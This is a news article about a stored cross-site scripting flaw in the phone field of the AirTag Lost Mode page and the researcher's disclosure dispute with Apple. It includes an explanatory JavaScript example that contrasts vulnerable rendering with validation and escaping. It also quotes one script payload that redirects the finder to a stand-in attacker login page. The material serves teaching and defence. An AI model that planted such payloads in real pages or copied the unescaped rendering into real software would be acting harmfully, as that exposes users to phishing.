AirTag bug can lead finders to phishing sites

Security researcher Bobby Rauch has discovered an embarrassing security flaw in Apple’s AirTag, reports Krebs on Security. The bug means that anyone who finds a lost AirTag can be tricked into visiting a phishing site.

When the owner puts an AirTag into Lost Mode, Apple’s system generates a unique link on the found.apple.com domain. The page behind that link can show the finder a personal message and the owner’s phone number, if the owner chooses to fill those in.

What Bobby Rauch discovered is that the text field for the telephone number has no input validation: it accepts anything, including HTML and JavaScript, and the found.apple.com page then renders that content for whoever scans the tag. In other words, the field is a stored cross-site scripting (XSS) vector on an Apple domain.

This means an attacker can prepare a batch of AirTags carrying malicious code and drop them in chosen places where, for example, a politician or other target is likely to pick one up. The finder scans the tag expecting a legitimate Apple page and is instead sent to a phishing site.
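To make the mechanism concrete, here is an added example, not Apple’s code and not from Rauch’s report, of a lost-item page that interpolates the owner’s “phone number” straight into HTML, next to the two layers that would have stopped it: an allowlist check on input and HTML encoding on output. The function names, the page markup and the payload are hypothetical; the payload is constructed to stand in for what an attacker would type into the phone field.

```javascript
// Added example (not Apple's code): how an unvalidated "phone number" field
// on a lost-item page becomes stored XSS, and the two layers that stop it.
// Function names, the page markup and the payload are hypothetical.

// Layer 1, input validation: accept only what a phone number can look like.
// An optional leading "+", then 6 to 20 digits, spaces, dashes or parentheses.
function validatePhoneNumber(input) {
  const trimmed = String(input).trim();
  return /^\+?[0-9 ()-]{6,20}$/.test(trimmed) ? trimmed : null;
}

// Layer 2, output encoding: neutralise HTML metacharacters before the value
// is interpolated into markup, regardless of what validation let through.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable rendering: the stored value goes straight into the HTML, so a
// "phone number" such as a <script> tag executes in the finder's browser.
function renderFinderPageVulnerable(record) {
  return `<p>This item is lost. Please call ${record.phone}</p>`;
}

// Hardened rendering: the value is encoded on output. The finder sees the
// attacker's text as literal characters, and nothing executes.
function renderFinderPageSafe(record) {
  return `<p>This item is lost. Please call ${escapeHtml(record.phone)}</p>`;
}

// Both layers together: reject at submission time, encode at render time.
// Returns null when the owner-supplied value is not a phone number.
function buildFinderPage(phoneInput) {
  const phone = validatePhoneNumber(phoneInput);
  return phone === null ? null : renderFinderPageSafe({ phone });
}

// Constructed payload standing in for what an attacker would type into the
// phone field: a script that redirects the finder to a phishing page.
const PAYLOAD = '<script>location="https://attacker.example/login"</script>';

// Demo: the vulnerable page ships the script verbatim; the hardened path
// rejects the payload outright and encodes anything it does accept.
console.log(renderFinderPageVulnerable({ phone: PAYLOAD }));
console.log(buildFinderPage(PAYLOAD));            // null: rejected on input
console.log(buildFinderPage('+1 (555) 010-0100'));
```

Validation alone is not enough, because a field that is “just a phone number” today may be widened tomorrow; encoding alone is not enough, because the stored value may be rendered by other code paths. The two checks are independent, so a page should do both.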

When Bobby Rauch reported the bug to Apple at the end of June, he initially received only a reply that Apple was investigating. He responded that he would wait 90 days before publishing details.

Five days after that deadline, a new email arrived from Apple confirming the bug and announcing that it would be fixed in an update. He was asked to keep quiet about it for a while longer. He replied that he could do so if he were told when the fix would ship and whether he would receive a reward under Apple’s bug bounty program.

The only answer was that Apple hoped he would not disclose anything, and Bobby Rauch says he therefore published the bug in protest.

Bobby Rauch is not the first security researcher to criticize Apple’s bug bounty program recently. Last week, Denis Tokarev wrote a blog post about his negative experience of reporting bugs to Apple.